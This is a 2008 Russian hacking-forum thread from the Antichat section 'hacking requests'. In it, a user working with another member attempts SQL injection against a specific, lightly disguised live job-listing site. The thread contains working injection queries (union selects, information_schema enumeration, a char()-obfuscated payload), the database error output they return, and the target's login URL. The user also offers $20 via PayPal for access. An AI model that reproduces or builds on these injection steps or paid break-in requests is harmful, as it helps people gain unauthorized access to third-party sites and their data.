Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)
-   -   Помогите с MS SQL (https://forum.antichat.xyz/showthread.php?t=89326)

strecher 27.10.2008 20:30

Помогите с MS SQL
 
Копаю сайт уже две недели. Нашёл несколько работающих инклудов.

Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь. Ничё не подошло. Знаю только одну таблицу 'Jobs'.

Доступ к сайту запаролен. Админ там давно не был и не хочет давать доступ в адмику так как сервер его, а сайт мой (он для меня делал).

Пишите в личку дам пароль.

aka PSIH 27.10.2008 20:40

Цитата:

Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь.
в mssql все проще ;)
select top 1 table_name from information_schema.tables
select top 1 column_name from information_schema.columns where table_name='name'

strecher 27.10.2008 20:53

не прокатывает, причём работает только когда делаю запросы /viewjob.asp?v=1 union select * from jobs без ' и --
Цитата:

Сообщение от aka PSIH
select top 1 table_name from information_schema.tables

Код:

Microsoft JET Database Engine error '80040e14'

Syntax error. in query expression 'id = 440 select top 1 table_name from information_schema.tables'.

/jobs/editjob.asp, line 7

Цитата:

Сообщение от aka PSIH
select top 1 column_name from information_schema.columns where table_name='name'

Код:

Microsoft JET Database Engine error '80040e14'

Syntax error. in query expression 'id = 440 select top 1 column_name from information_schema.columns where table_name='jobs''.

/jobs/editjob.asp, line 7

P.S. Я здесь все туториалы перекопал.

aka PSIH 27.10.2008 21:00

мдауж...
Проведение Инъекций в MSSQL сервер от Microsoft.
Работа С СУБД Через Иньекцию Запроса

strecher 27.10.2008 21:18

Первую статью я вчера прочитал.

Вторую уже :)

Почему select top 1 неработает хотя select union 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26 from jobs работает?

strecher 27.10.2008 21:30

этот запрос хорошо проходит ;)

Код:

http://www.site.com/news.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+  INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+  (char(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)))--
Microsoft JET Database Engine error '80004005'

Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.md b'.

/jobs/editjob.asp, line 7

как бы мне им воспользоватся?

strecher 27.10.2008 23:35

ну у меня есть $20 в paypal'е так что дерзайте, доступ нужен позарез.

z_i_b_i_o.co.uk/jobs/login.ht_m (уберери _)

два85три9867адын - за пассом

aka PSIH 28.10.2008 04:53

это ms access
https://forum.antichat.ru/showthread.php?t=50550

strecher 28.10.2008 13:51

Цитата:

Сообщение от aka PSIH

спасибо, вроде всё то.


Время: 05:23